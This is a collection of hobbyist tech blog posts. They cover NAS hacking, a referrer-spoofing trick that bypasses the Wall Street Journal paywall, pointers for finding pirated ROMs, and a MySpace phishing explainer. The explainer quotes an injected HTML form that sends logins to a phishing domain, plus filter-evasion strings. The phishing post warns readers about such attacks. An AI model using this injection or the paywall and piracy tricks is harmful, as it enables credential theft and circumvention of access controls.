mgroves

So, I bought myself a MyBook World 1TB network hard drive for Christmas. I was hoping that my Xbox 360 would "just see it" on the network, and I could stick all my videos and stuff on there via my laptop, or other computer.

I was wrong on both counts.

First, no matter what I did, I couldn't get my Xbox 360 to see it.

Second, in the process of trying to hack around with it, I made this little NAS drive into a pretty versatile media server.

I found this great little wiki site that's all about hacking the MyBook World. The key? Enabling SSH. Once you have that, you then have full root access to a lightweight linux server right there in the same box. Now, this isn't exactly a powerhouse machine: it's some sort of ARM processor with something like 64mb of memory. But it turns out, you can do a lot with that.

The first step was being able to download and install/build stuff. To do that, I at least needed a compiler. Fortunately, the site above has a very handy zip file containing all I need to copy over a C compiler. Next, I installed a package manager called optware, which is kinda like an apt-get sort of thing, except it's meant to install stuff on embedded systems like NAS drives or routers.

From that point, no more compiling! I next installed ushare via optware, which is a media server. I had to play with the configuration a bit, but now my NAS drive (with a name of my choosing) shows up on Xbox 360! Woo!

But wait, there's more. Oh yes, much more. I also installed Transmission, a bittorrent client with a web interface. I think you see where this is going. My laptop is now no longer involved in any part of this. I can stick torrent files into a "watch" directory, and Transmission picks them up automatically. Of course, I can do this from any computer via SSH, or via the normal network drive share. I even installed Lynx on the NAS, so I can even skip the middleman.

And one last neat trick: I installed Python and pytvshows to automatically poll RSS feeds for shows that I want to watch and download their torrent files in the watch folder, where they get picked up my Transmission. Now it's completely hands-free! Unfortunately, pytvshows is a bit out of date, and ezrss.it doesn't seem very reliable these days. So, after CodeMash, I decided to install Ruby, and write my own torrent grabbing script.

In short, I wouldn't recommend getting this drive, unless you enjoy hacking around with it for endless hours. Fortunately for me, I'm a nerdy coder that's used compilers, linux, etc, before, so I had some idea of what I was doing. For the average Joe, this is a mountain of a task.

Here's a neat trick that I just learned. Ever wanted to print something to PDF, but for whatever reason, printing to your PDF Printer/CutePDF/etc was blocked?

Well, I've found an incredibly circuitous way around it!

First, make sure your actual printer is turned off. Yes, turned off. Now, try printing out the thing which you want to become a PDF. Your computer will likely say something like "GREERRRRORR CANNOT PRINT YOUR PRINTER IS OFF MMMBBEEP". This is good. Now, don't cancel or anything like that: leave the error message there!

Okay, now here's the tricky part: open up a file explorer window and go to c:\Windows\System32\spool\PRINTERS. You should see a file here like "FP00059.SPL". The "FP00059" could be anything, the important part is the .SPL. Copy this file somewhere else, like your desktop. Okay, now you can cancel the error or turn your printer back on and print, whatever.

So what is this SPL file? It's what's known as a "spool", which is an antiquated term meaning "stuff that's ready to print but hasn't been sent to the printer yet". If only there was some way to view this file...but wait! There is! I found a nice small program called EMF Printer Spool File Viewer, which, despite it's incredibly ambiguous name, let's you view EMF Printer Spool Files. Download it, run it, file->open the SPL file.

Ahhhh, now we see the thing which we want to put in a PDF. Fortunately, the EMF file viewer has no problem letting you do a File->Print to PDF Printer/CutePDF/etc. So do it already. Now you have a nice PDF file with which to do all manner of haberdashery upon. Now don't use this to circumvent DRM or anything, because that would just be wrong.

Speedlinking is yet another tool of the lazy blogger. Basically I smash together a bunch of interesting links that I collect every so often, and write a sentence or two about them.

This week's Speedlinking is being brought to you courtesy of the useful Instapaper website, which I've been using to temporarily bookmark the below links.

• Hail, Xenu! Use it to find broken links on your site.
• Drink tea? Here are some useful things to do with those used teabags.
• The Wall Street Journal reports on the many links between Saddam Hussein's government and terrorism that are discussed in a recently released Pentagon paper. The most interesting thing to me is that terrorism was really Saddam's only "tool", because of the sanctions and no fly zones and what not. Unintended consequences and all that.
• The number 6174 is actually pretty awesome.
• If you tinker around with the URL, you can actually increase the quality of playback on YouTube videos. I guess YouTube went ahead and made this an account option too, so you can always default to "HD" if you want.
• ha.ckers.org looks at an interesting method of spamming: exploiting the ability to change email addresses without confirmation.

Speedlinking is yet another tool of the lazy blogger. Basically I smash together a bunch of interesting links that I collect every so often, and write a sentence or two about them.

• Brian Wesbury, an optimist, noted economist, and writer for the Journal says that The Economy Is Fine (Really)
• The Reds are trying to build up some goodwill and sell more tickets in Central Ohio by refurbishing 13 baseball diamonds in Columbus.
• uʍop-ǝpısdn ʇxǝʇ ɹnoʎ dılɟ
• In Excel, sometimes you want to add those "hidden" apostrophes to numerical data so that it becomes a string. Use this VB function as a macro to do that en masse.
• Have you played Passage yet?
• Type in the url of your website, and find out what other sites are hosted on the same server. Obviously, this isn't going to be very interesting if you have a dedicated server. Sites hosted on the same server as mgroves.com include: The Getaway Gift Shop, Atheist-blog, Big Tree Marketing, Beauty Madness (tickles-and-things.com).
• A save game exploit was found in Zelda: Twilight Princess that allows unsigned code to be run. This is similar to the PSP exploit that eventually allowed the system to be "soft-modded" (i.e. run homebrew/pirated programs). That can't be done on the Wii yet, but maybe soon.

I get asked alot "hey where do I get roms?"

More precisedly, "HEY D00D WHAR IZ de ROMz?"

Well, I can't really host most of the commercial ROMs here on my site for fear of legal repercussions, but I can give you a few hints about where else to find them.

To be clear, the legality of ROMs is somewhat gray, but I'm almost 100% certain that it's illegal to have a ROM for a game that you do not already own in some other form. Even if you do own it, I'm not 100% sure it's legal to have it on a ROM. I am not a lawyer, and this is not legal advice.

That being said, here's some general guidelines on how to find ROMs. First, what the heck is a ROM? Well, to be more precise, when I say ROM, what I really mean is a ROM image, which is just a copy of data from a chip. It could be from an NES game, a Genesis game, or the firmware in a cell phone. A ROM isn't much use unless you are able to "flash" it to some sort of hardware or you have an emulator that can interpret the ROM on some non-native device (like your PC, or a Game King.

Okay, so there's lots of more information about ROMs and emulation out there, I'm not going to go over it all here, but you can check out some of my other blog posts about emulation.

Now, suppose you have an emulator/device/whatever and you want to get some ROMs to play games on it. Where do you get ROMs?

• The "usual" sources. This includes P2P networks like Limewire, Shareaza, etc, and my current favorite, BitTorrent (which is much different than a traditional P2P network). You will need a BitTorrent program like BitComet and a website to download torrent files. Some good ones are The Pirate Bay and isoHunt. Torrents are a good way to get ROMs in quantity, but not so great if you are looking for specific ROMs.
• IRC. Internet Relay Chat has been around for at least 100 years. It's the original chat protocol for the internet, before all you kids and your instant messanger and MySpaces and what not. Yeah it's good for chat, but it's also good for finding specific things. In this case, ROMs.

IRC is a big place. Where to start?

I'd recommend starting at roms-isos.com, the website for a chat room that I have been know to frequent, #roms-isos (IRC chat rooms start with #). You will eventually need an IRC program, of which the most widely used by far is mIRC (and for good reason). Once you have mIRC and have figured out how to connect to the #roms-isos chat room, you can follow this handy guide to using an FServe, which is a "file server" in an IRC chat room.

It's a little tricky and complex, but like I always say, nothing worth doing is ever easy. So, good luck, and stop asking me for ROMs. I won't give you any.

Listen as the love child of Ray Ramano and Christopher Walken comments on a video of the hardest Super Mario hack ever.

I can't find the original source of this hack, but it's rather masochistic and close to impossible.

There are some really funny lines in this video, and I encourage you to watch the whole thing.

The guy commenting wasn't actually playing, he just added his commentary.

The Wall Street Journal, for the most part, is a subscription based service. News Corp. has recently purchased the Dow Jones company, which owns The Wall Street Journal, and some speculate that they will turn it into a "free" service, much like the New York Times, USA Today, and pretty much every other newspaper's web presence.

Until that day, here is a trick to view any online Wall Street Journal (WSJ) article for free with only marginal hassle.

I pieced this hack together myself, though the parts of it are well documented elsewhere.

WSJ does publish some of its content for free already. I noticed that Google News always seemed to link to these free articles. I'm a WSJ RSS feed subscriber (they have a ton of different feeds, but I subscribe to a few). One day there was an article I really wanted to read the full version of. So, I just copied the title into Google News, and there it appeared. Something must be up!

I noticed mod=googlenews_wsj in the URL of the article. So that got me searching a little bit, and I found a Firefox hack to get WSJ articles for free. However, this method was kinda slow and annoying. Surely there's a better way!

Just adding mod=googlenews_wsj to the article URL doesn't work. So I figured that maybe they were also checking the referral URL, and that's why the Firebug/Webdev thing works. But that's so much hassle!

Enter RefControl. This is a Firefox plugin that allows you to control what page a site thinks you were referred from. So I just set "online.wsj.com" to always be referred from "news.google.com".

Once you have RefControl setup this way, the only hassle you have left to do is to change the URL querystring to mod=googlenews_wsj. For instance, this link from the main page: http://online.wsj.com/article/SB119090449388941349.html?mod=hpp_us_whats_news, just change it to http://online.wsj.com/article/SB119090449388941349.html?mod=googlenews_wsj. Done! Free WSJ for everyone.

There's probably a solution for IE and Opera as well, but for now this just works for Firefox.

When jonjay posted some pictures of the inside of his Game King-II, I realized that even though the instruction manual indicated a 1100mAh battery, that there was actually a 750mAh battery in there. Such dishonesty from a random Chinese company!

But nevermind, why not just put a 1100mAh battery in it for great justice?

So first, I cracked open the Game King-II myself, to see about the physical size of the battery, and if I could actually fit a different battery in there. Then, I went on to eBay to see what I could find.

The Game King-II uses a 3.7volt battery, which luckily for me, is pretty much the predominant battery used in cell phones. Next, I did a quick search for batteries in the 1000-1500mAh range. I found an LG 3.7volt 1100mAh battery which, by complete random luck, is the exact same size battery used in my cell phone. Perfect! Even if the mod doesn't work, I can at least upgrade my phone. Not to mention I couldn't really find any other batteries that would fit any higher than 1100mAh.

The next trick was taking out the old battery. It's a ridiculously cheap looking battery. Imagine a tiny static bag filled with acid. The connections were soldered, and there were also some components connected to the battery on a small circuit board. I had to carefully removed the battery using a soldering iron.

Next, I had to figure out a way to connect the new battery. It's made to fit in a cell phone, not to be soldered, so I had to get creative. I carefully dropped some molten solder on to the terminals. Please be very careful if you do this! There is plastic, heat, and battery acid, not things you want to mess with. I would only recommend this if you have precision experience using a soldering iron. Don't apply heat directly to the battery.

I cut a couple of short jumpers, heated up the solder on the battery, and carefully attached them to the battery. I then wrapped it up with some electrical tape, but not too much, otherwise the battery wouldn't have fit back in.

Fortunately, the board indicated where to connect the positive and negative, so I then made another couple of precision solders to the battery board. I tried to cover everything up with a small amount of electrical tape as best I could.

When putting the battery back in, I used some of the sticky strip that held the previous battery in place on the new battery. These batteries are almost identical in size. I closed the Game King-II back up after a quick power-on to test.

Voila! Upgraded Game King-II with longer battery life! It should last about 46% longer. All in all, it cost me less than $5 and only took about an hour.

As hundreds of thousands of people found out today, that little naughty thing you did with your 360's drive firmware is gonna cost ya.

As of 4:00 EST most of us were automatically signed out of XBox live and not allowed back in. It seems Microsoft finally did the impossible and banned all the people with firmware mods that allowed the play of backup games.

So far, this has caused an internet uproar and could lead to internet riots. Instead of griping about how Microsoft screwed you, remember back to the day you decided to mod, and the little guy on your shoulder named "good conscience" that said that someday you might get banned from Live. You had to expect this and you had to know Microsoft wasn't going to let it go forever.

My question is, what about the XBox Gold subscriptions that were paid for, and all the XBLA games that we purchased that we can't play anymore? Isn't it illegal to just take them away?

Some questions come from this:

• How long 'til the next mod gets released that allows us to play on Xbox Live?
• Why now? Did they have the power to do this the whole time? Did they just give us the taste of Halo 3 and then give the proverbial "go to hell"?

Just remember fellow pirates, we can still play the games, just can't do anything fun with them like get updated content, play online, or gain achievement scores.

It takes a big man to admit that he screwed up. At least, that's what I tell myself.

MySpace is the cesspool of the intertubes: angsty teens, dopey high schoolers, awful musicians, spammers, scammers, griefers, hackers, the rock stupid, and me.

MySpace hacks are nothing new. ha.ckers.org comes across vectors all the time, due to lazy or ignorant programming on behalf of MySpace. Phishing isn't new either. A web developer and long-time user of the web shouldn't fall prey to either of these attacks. But I did.

Now let me show you how simple the attack was, and how to do it yourself.

Let's start with the catalyst. A simple message in my MySpace inbox. Click on any of the following images for a full-size version.

See anything out of the ordinary? Look again:

That form is not submitting to MySpace.com. Chances are, you wouldn't even think to check the URL that the form submits to. After all, this form is definitely on MySpace.com, and why would their form submit to anything else? (Hindsight is making me feel real dumb at this point).

It turns out that changing the form URL is incredibly easy, or at least it was a day or two ago. Here's the HTML that makes up the message you see above:

If you are familiar with HTML forms, then you can see exactly what the problem is. Whoever wrote the message wrote a "close form" tag (</form>) and opened a new form tag (<form action="http://login-myspace-viewmessage-mytoken-daw83kz.com/login.cfm.php">). Since there was already an existing "open" and "close" form tags already on the page, the phisher simply broke the form into two pieces, with the 2nd form capturing the buttons at the bottom of the page, and submitting to a URL of his choosing.

Okay, so big deal, the form goes to some other URL. Why is that a problem? The exploit here is that most users don't expect to be hurtled off of MySpace at that point, which means that if the page they are hurtled to looks exactly like a MySpace login screen, then that user is likely to enter their login and password without a second thought. At this point, the phiser collects a login/password to your account, which means he can send spam, send more phishing attempts out, vandalize your site, or pretty much do anything he wants with your MySpace account.

Now maybe you're thinking: this attacks seems too easy, too obvious. And you're right. MySpace allows HTML to be used in these messages, which is fine, except they don't filter out potentially problematic HTML, or don't filter it out well.

In fact, MySpace is notorious for this type of lazy code. Let's say you were a really naive programmer, or stupid, or whatever. If you saw this "</form>" problem, and were tasked with fixing it, what might you do? Maybe just remove "</form>" from all user input before sending the message? That'll work right? Wrong. What if the phisher typed in one of the following?

• </fo</form>rm>
• </form>

Your find & remove idea wouldn't work!

Anyway, I could write a lot more about this, but sites like ha.ckers.org do a much better job.

Let me just show you that I did the same phishing attack in about 2 minutes (I sent my own account a phishing attempt):

Notice the address at the bottom.

So what's the point of all this? It's to show you that phishers aren't just dumb script kiddies interested in pranking--they are intelligent, dedicated hackers intent on making a buck. It's also to show you that a clever phishing attempt can fool anyone, from "dumb" average users, to "smart" IT professionals.

Though I suppose this whole article could just be an attempt to cover my shame. Man, I feel stupid!